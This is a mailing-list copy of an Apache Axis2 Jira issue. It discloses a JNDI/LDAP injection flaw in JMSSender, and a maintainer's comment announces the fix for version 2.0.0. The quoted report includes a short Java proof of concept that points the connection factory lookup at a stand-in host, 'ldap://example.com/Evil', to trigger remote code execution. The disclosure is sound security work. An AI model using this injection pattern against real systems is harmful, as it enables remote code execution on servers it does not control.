[ 
https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17925784#comment-17925784
 ] 

Robert Lazarski commented on AXIS2-6062:
----------------------------------------

Thanks for bringing this issue to our attention. I made the following commit, 
which passes our unit tests. 

https://github.com/apache/axis-axis2-java-core/commit/3b2aeee3712a2b3269fdbda38e4c2315f59c5027

I am marking this issue closed, which will go out soon with 2.0.0. 

> Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol 
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
>                 Key: AXIS2-6062
>                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
>             Project: Axis2
>          Issue Type: Bug
>          Components: JMS transport
>    Affects Versions: 1.8.2
>            Reporter: Letian Yuan
>            Assignee: Robert Lazarski
>            Priority: Critical
>             Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method, 
> `{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a 
> JMS message. However, if we send a JMS message like this:
>  
> {{    MessageContext context = new MessageContext();}}
> {{    context.setProperty("TransportURL", 
> "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil";);}}
> {{    JMSSender sender = new JMSSender();}}
> {{    sender.invoke(context);}}
>  
> Then, arbitrary commands from remote server "ldap://example.com/Evil"; would 
> be executed.
> We want to discuss with you about it.
> First, excecuting arbitrary commands from remote server is quite dangerous. 
> Second, as far as we know, no one would use LDAP protocol to get 
> `{{{}ConnectionFactory{}}}`.
> Third, it seem this behavior has not been documented in your “User’s Guide”, 
> so library users might not know this API of sending JMS messages can be used 
> to execute arbitrary commands. So, I think that library users are very 
> possible to misuse this API. For example, concatenating user input to the 
> parameter of `{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}` 
> available in a configuration file such as `{{{}foobar.properties{}}}`. We 
> know that such cases rarely happen and might not be your design purpose, but 
> it is possible anyway. As long as an attacker can control the parameter of 
> `{{{}invoke{}}}`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether 
> it is necessary for LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org
For additional commands, e-mail: java-dev-h...@axis.apache.org

Reply via email to